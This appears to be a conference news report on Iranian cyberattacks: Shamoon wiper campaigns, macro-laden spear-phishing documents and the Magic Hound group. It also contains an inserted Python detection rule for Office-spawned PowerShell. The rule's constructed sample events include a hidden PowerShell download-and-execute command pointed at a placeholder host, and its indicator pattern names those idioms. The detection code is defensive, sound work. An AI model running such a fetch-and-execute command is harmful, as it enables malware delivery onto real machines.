RSA CONFERENCE – San Francisco – As all eyes are on Russia's coordinated hacking and propaganda efforts aimed at influencing elections in the US and some European nations, state-sponsored attackers out of Iran are quietly cranking up their cyber spying and data-destruction attacks.
Most of Iran's targets over the past few months have been in the Middle East – namely its nemesis Saudi Arabia – but some security experts warn that the US indeed could be in the line of fire given the increasingly contentious geopolitical climate between the two nations.
Former national security advisor Michael Flynn's recent declaration that the US had put Iran "on notice" and subsequent anti-US protests and sentiment in Iran are the perfect recipe for an increase in cyber espionage and cyberattacks meant to destabilize or protest US policies on Iran, according to Adam Meyers, vice president of intelligence at CrowdStrike.
Meyers says Iran's nation-state hacking machine is more prolific than ever lately. "What's new is the level of activity we've seen, with dozens of targets in Saudi Arabia over the past two months," Meyers said in an interview here.
"One of the things we're tracking is if things escalate between the US and Iran, then we expect attacks will be likely in the financial sector" in the US in response, he said.
Iran's cyberattack operations also have matured and become more disciplined, he says. "They are showing more mature capabilities" and organization, Meyers explained. "In early 2010 to 2014, they were very open, disorganized, [as] small companies doing training and pen-testing and exploit development. Now they've aligned themselves into proper 'businesses' working on attack campaigns," he said. "We don't see them talking [about their cyber activities] as openly as before. That's notable."
In 2012, hackers believed to be out of Iran launched the devastating Shamoon data-wiping attacks on Middle East petroleum giant Saudi Aramco, damaging or wiping the hard drives of some 25,000 computers. The following year, US banks suffered a massive wave of distributed denial-of-service (DDoS) attacks that US officials blamed on Iran.
Then Shamoon reappeared in November of last year and again in January of this year, with a slightly modified version of the destructive malware, hitting thousands of computers across more than 10 government and civil organizations in Saudi Arabia and the Gulf States.
IBM's X-Force incident response services team, IRIS (Incident Response and Intelligence Services), here this week, revealed its findings on just how the new Shamoon malware was unleashed on its victims, something that had been mostly speculated on for some time, given the nature of data-wiping attacks that leave little forensic evidence behind.
The latest Shamoon attacks began with a spear phishing email sent to employees at the targeted organizations. Each email carried a Microsoft Word document rigged with a malicious macro that, when enabled by the victim, infected his or her machine. The macro launches PowerShell, giving the attackers remote command-line control of the machine, which lets them add other malware or gain privileged access to other systems on the victim's network.
Once the attackers have enough intel to find juicy targets on the network, they deploy Shamoon, which overwrites the hard drives and disables the affected computers.
Wendi Whitmore, global lead of IBM X-Force IRIS, said her team has mostly seen the new Shamoon campaign targeting Middle East organizations. "Right now, the biggest threat is really to the Middle East region, from what we've seen," she said in an interview here. IBM did not determine the initial attack vector of the 2012 Shamoon campaigns, she said.
Whitmore said she expects more Shamoon and destructive-type attacks to come. "Especially with how dynamic the political environment is now," she said.
Meanwhile, researchers from Palo Alto Networks' Unit 42 team have spotted other targeted attacks on government, energy, and technology organizations mainly in Saudi Arabia, or on organizations that do business there. PAN calls the attack group "Magic Hound," noting that it may be somehow connected to the Iranian "Rocket Kitten" cyber espionage gang.
Unit 42 stopped short of tying these attacks to the Shamoon group. Rocket Kitten is best known for keylogging and other traditional cyber spying. Like the second Shamoon attacks, Magic Hound relies on malicious macros in Microsoft Office documents that call Windows PowerShell to wrest control of the victim machines.
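As an added defender-side illustration (not from the article or from any vendor cited in it), the following Python flags the Office-macro-to-PowerShell chain described in both the Shamoon and Magic Hound passages above in Sysmon-style process-creation events; the sample events, the parent/child process lists and the command-line indicators are constructed assumptions, not observed data.

```python
import re

# Constructed Sysmon-style process-creation (Event ID 1) records; not real
# logs. Field names follow Sysmon's, but every value here is made up.
SAMPLE_EVENTS = [
    {"EventID": 1, "User": r"CORP\analyst1",
     "ParentImage": r"C:\Program Files\Microsoft Office\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -NoP -W Hidden -EncodedCommand SQBFAFgAIAAoAE4AZQB3AC0A"},
    {"EventID": 1, "User": r"CORP\admin",
     "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -File C:\scripts\inventory.ps1"},
    {"EventID": 1, "User": r"CORP\finance2",
     "ParentImage": r"C:\Program Files\Microsoft Office\Office16\EXCEL.EXE",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe /c powershell -w hidden -nop -c \"IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/s')\""},
    {"EventID": 1, "User": r"CORP\hr3",
     "ParentImage": r"C:\Program Files\Microsoft Office\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -Command Get-Date"},
]

# Office applications that should almost never spawn a shell, and the
# interpreters a malicious macro typically launches (detection assumption).
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SHELL_CHILDREN = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe"}
# Command-line traits that raise severity: encoded/hidden PowerShell, profile
# bypass, and in-memory download-and-execute idioms (assumed indicator list).
SUSPICIOUS_ARGS = re.compile(
    r"(?i)(-enc(odedcommand)?\b|-nop\b|-w(indowstyle)?\s+hidden|downloadstring|\biex\b)")

def basename(path):
    return path.rsplit("\\", 1)[-1].lower()

def score_event(ev):
    """Return an alert dict for an Office-spawned shell, or None if benign."""
    if ev.get("EventID") != 1:
        return None
    parent, child = basename(ev["ParentImage"]), basename(ev["Image"])
    if parent not in OFFICE_PARENTS or child not in SHELL_CHILDREN:
        return None
    hits = sorted({m.group(0).lower() for m in SUSPICIOUS_ARGS.finditer(ev.get("CommandLine", ""))})
    return {"user": ev["User"], "parent": parent, "child": child,
            "severity": "high" if hits else "medium", "indicators": hits}

def detect(events):
    """Run the rule over a batch of events and return only the alerts."""
    return [alert for alert in map(score_event, events) if alert]
```

An Office parent spawning a shell is alerted even with a clean command line (medium), because the macro itself is the anomaly; encoded, hidden or download-and-execute arguments escalate it to high.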
"The weaponized Office documents were found to be hosted either on what appeared to be compromised legitimate websites, or on websites using domain names similar to legitimate domain names in appearance," according to Unit 42's research. "The two legitimate websites we were able to identify were owned by organizations in the government and energy sectors. Based on the existence of these malicious files on the legitimate websites, it is highly probable that the websites had already been compromised in some fashion."
The initial attack vector was likely the old standby, spear phishing, according to the researchers.